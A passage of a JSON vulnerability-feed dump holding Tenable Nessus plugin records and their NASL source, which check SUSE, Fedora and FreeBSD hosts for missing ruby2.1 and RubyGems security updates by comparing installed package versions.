"cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1067-1.NASL", "href": "https://www.tenable.com/plugins/nessus/99578", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1067-1.\n# The text itself is copyright (C) 
SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99578);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-4975\", \"CVE-2015-1855\", \"CVE-2015-3900\", \"CVE-2015-7551\", \"CVE-2016-2339\");\n script_bugtraq_id(68474, 74446, 75482);\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : ruby2.1 (SUSE-SU-2017:1067-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This ruby2.1 update to version 2.1.9 fixes the following issues:\nSecurity issues fixed :\n\n - CVE-2016-2339: heap overflow vulnerability in the\n Fiddle::Function.new'initialize' (bsc#1018808)\n\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and\n DL (bsc#959495)\n\n - CVE-2015-3900: hostname validation does not work when\n fetching gems or making API requests (bsc#936032)\n\n - CVE-2015-1855: Ruby'a OpenSSL extension suffers a\n vulnerability through overly permissive matching of\n hostnames (bsc#926974)\n\n - CVE-2014-4975: off-by-one stack-based buffer overflow in\n the encodes() function (bsc#887877) Bugfixes :\n\n - SUSEconnect doesn't handle domain wildcards in no_proxy\n environment variable properly (bsc#1014863)\n\n - Segmentation fault after pack & ioctl & unpack\n (bsc#909695)\n\n - Ruby:HTTP Header injection in 'net/http' (bsc#986630)\n ChangeLog :\n\n- http://svn.ruby-lang.org/repos/ruby/tags/v2_1_9/ChangeLog\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://svn.ruby-lang.org/repos/ruby/tags/v2_1_9/ChangeLog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1014863\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1018808\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=887877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=909695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=926974\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=959495\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=986630\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-4975/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-1855/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3900/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7551/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2339/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171067-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b050ba23\"\n );\n script_set_attribute(\n attribute:\"solution\", \n 
value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-624=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP1:zypper in -t\npatch SUSE-SLE-SDK-12-SP1-2017-624=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-624=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-624=1\n\nSUSE Linux Enterprise Server 12-SP1:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-624=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-624=1\n\nSUSE Linux Enterprise Desktop 12-SP1:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP1-2017-624=1\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2017-624=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libruby2_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libruby2_1-2_1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ruby2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ruby2.1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:ruby2.1-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ruby2.1-stdlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ruby2.1-stdlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1/2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1/2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libruby2_1-2_1-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libruby2_1-2_1-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ruby2.1-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ruby2.1-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ruby2.1-debugsource-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ruby2.1-stdlib-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ruby2.1-stdlib-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libruby2_1-2_1-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libruby2_1-2_1-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ruby2.1-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ruby2.1-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", 
reference:\"ruby2.1-debugsource-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ruby2.1-stdlib-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ruby2.1-stdlib-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libruby2_1-2_1-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libruby2_1-2_1-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ruby2.1-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ruby2.1-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ruby2.1-debugsource-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ruby2.1-stdlib-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ruby2.1-stdlib-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libruby2_1-2_1-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libruby2_1-2_1-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"ruby2.1-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"ruby2.1-debuginfo-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"ruby2.1-debugsource-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"ruby2.1-stdlib-2.1.9-15.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"ruby2.1-stdlib-debuginfo-2.1.9-15.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else 
security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby2.1\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:44", "description": "Update to RubyGems 2.2.5.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-08-20T00:00:00", "type": "nessus", "title": "Fedora 21 : rubygems-2.2.5-100.fc21 (2015-13157)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygems", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2015-13157.NASL", "href": "https://www.tenable.com/plugins/nessus/85553", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-13157.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85553);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-3900\");\n script_xref(name:\"FEDORA\", value:\"2015-13157\");\n\n script_name(english:\"Fedora 21 : rubygems-2.2.5-100.fc21 (2015-13157)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to RubyGems 2.2.5.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1236116\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-August/164236.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?40313ff4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygems package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygems\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"rubygems-2.2.5-100.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygems\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:12:48", "description": "Jonathan Claudius reports :\n\nRubyGems provides the ability of a domain to direct clients to a separate host that is used to fetch gems and make API calls against.\nThis mechanism is implemented via DNS, specifically a SRV record\n_rubygems._tcp under the original requested domain.\n\nRubyGems did not validate the hostname returned in the SRV record before sending requests to it. 
This left clients open to a DNS hijack attack, whereby an attacker could return a SRV of their choosing and get the client to use it.", "cvss3": {}, "published": "2015-05-18T00:00:00", "type": "nessus", "title": "FreeBSD : rubygems -- request hijacking vulnerability (a0089e18-fc9e-11e4-bc58-001e67150279)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:ruby20-gems", "p-cpe:/a:freebsd:freebsd:ruby21-gems", "p-cpe:/a:freebsd:freebsd:ruby22-gems", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_A0089E18FC9E11E4BC58001E67150279.NASL", "href": "https://www.tenable.com/plugins/nessus/83513", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83513);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-3900\");\n\n script_name(english:\"FreeBSD : rubygems -- request hijacking vulnerability (a0089e18-fc9e-11e4-bc58-001e67150279)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jonathan Claudius reports :\n\nRubyGems provides the ability of a domain to direct clients to a\nseparate host that is used to fetch gems and make API calls against.\nThis mechanism is implemented via DNS, specifically a SRV record\n_rubygems._tcp under the original requested domain.\n\nRubyGems did not validate the hostname returned in the SRV record\nbefore sending requests to it. 
This left clients open to a DNS hijack\nattack, whereby an attacker could return a SRV of their choosing and\nget the client to use it.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=200264\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://blog.rubygems.org/2015/05/14/CVE-2015-3900.html\"\n );\n # https://vuxml.freebsd.org/freebsd/a0089e18-fc9e-11e4-bc58-001e67150279.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a870b517\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ruby20-gems\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ruby21-gems\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ruby22-gems\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ruby20-gems<2.4.7\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby21-gems<2.4.7\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby22-gems<2.4.7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:28", "description": "Update to RubyGems 2.4.8.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-08-11T00:00:00", "type": "nessus", "title": "Fedora 23 : rubygems-2.4.8-100.fc23 (2015-12501)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygems", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2015-12501.NASL", "href": "https://www.tenable.com/plugins/nessus/85309", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-12501.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85309);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-3900\");\n script_xref(name:\"FEDORA\", value:\"2015-12501\");\n\n script_name(english:\"Fedora 23 : rubygems-2.4.8-100.fc23 (2015-12501)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to RubyGems 2.4.8.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1236116\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163502.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3484cb87\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygems package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygems\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"rubygems-2.4.8-100.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygems\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:16:26", "description": "Update to RubyGems 2.4.8.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
